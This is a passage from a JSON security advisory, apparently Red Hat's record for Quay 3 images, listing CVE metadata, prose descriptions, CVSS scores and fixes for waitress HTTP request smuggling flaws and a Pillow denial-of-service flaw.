"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "openstack-mistral: information disclosure in mistral log"
},
{
"cve": "CVE-2019-16785",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2020-01-15T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1791420"
}
],
"notes": [
{
"category": "description",
"text": "An HTTP-request vulnerability was discovered in Waitress which implemented a \"MAY\" part of the RFC7230 which states: \"Although the line terminator for the start-line and header fields is the sequence CRLF, a recipient MAY recognize a single LF as a line terminator and ignore any preceding CR.\" Unfortunately, if a front-end server does not process header fields with an LF the same way as it processes those with a CRLF, it can lead to the front-end and the back-end server processing the same HTTP message in two different ways. This vulnerability can lead to a potential for HTTP request smuggling and splitting where Waitress may see two requests, while the front-end server only sees a single HTTP message.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "waitress: HTTP request smuggling through LF vs CRLF handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-16785"
},
{
"category": "external",
"summary": "RHBZ#1791420",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-16785",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16785"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785"
},
{
"category": "external",
"summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6"
}
],
"release_date": "2019-12-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "waitress: HTTP request smuggling through LF vs CRLF handling"
},
{
"cve": "CVE-2019-16786",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2020-01-15T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1791415"
}
],
"notes": [
{
"category": "description",
"text": "An HTTP-interpretation flaw was found in waitress which did not properly validate incoming HTTP headers. When parsing the Transfer-Encoding header, waitress would look only for a single string value. According to the HTTP standard, Transfer-Encoding should be a comma-separated list, with the inner-most encoding first, followed by any further transfer codings, ending with \u0027chunked\u0027. Because of this flaw, requests sent with: \"Transfer-Encoding: gzip, chunked\" would get ignored, and waitress would use the Content-Length header instead to determine the body size of the HTTP message. A remote attacker could exploit this flaw to force waitress to accept potentially bad HTTP requests or treat a single request as multiple requests in the case of HTTP pipelining.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "waitress: HTTP request smuggling through invalid Transfer-Encoding",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-16786"
},
{
"category": "external",
"summary": "RHBZ#1791415",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-16786",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16786"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786"
},
{
"category": "external",
"summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6"
}
],
"release_date": "2019-12-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "waitress: HTTP request smuggling through invalid Transfer-Encoding"
},
{
"cve": "CVE-2019-16789",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2019-12-26T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1789807"
}
],
"notes": [
{
"category": "description",
"text": "An HTTP-interpretation flaw was found in waitress, through version 1.4.0. If a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server, an HTTP request splitting could occur which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation. The highest threat from this vulnerability is data integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nFor Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-16789"
},
{
"category": "external",
"summary": "RHBZ#1789807",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-16789",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16789"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789"
},
{
"category": "external",
"summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2"
}
],
"release_date": "2019-12-26T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers"
},
{
"cve": "CVE-2019-19911",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2020-01-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1789540"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability was found in Pillow in versions before 6.2.2, where the FpxImagePlugin.py file calls the range function on an unvalidated 32-bit integer if the number of bands is large. On Windows systems running 32-bit Python, this flaw results in an OverflowError or MemoryError due to the 2 GB limit. On Linux systems running 64-bit Python, this flaw results in the termination of the process by the out-of-memory (OOM) killer. The highest threat from this vulnerability is to system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: uncontrolled resource consumption in FpxImagePlugin.py",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue did not affect the versions of python-pillow as shipped with Red Hat Enterprise Linux 7, and 8 as they did not include python-olefile, which is necessary to use the FPX image plugin.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-19911"
},
{
"category": "external",
"summary": "RHBZ#1789540",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789540"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-19911",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19911"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-19911",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19911"
}
],
"release_date": "2020-01-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
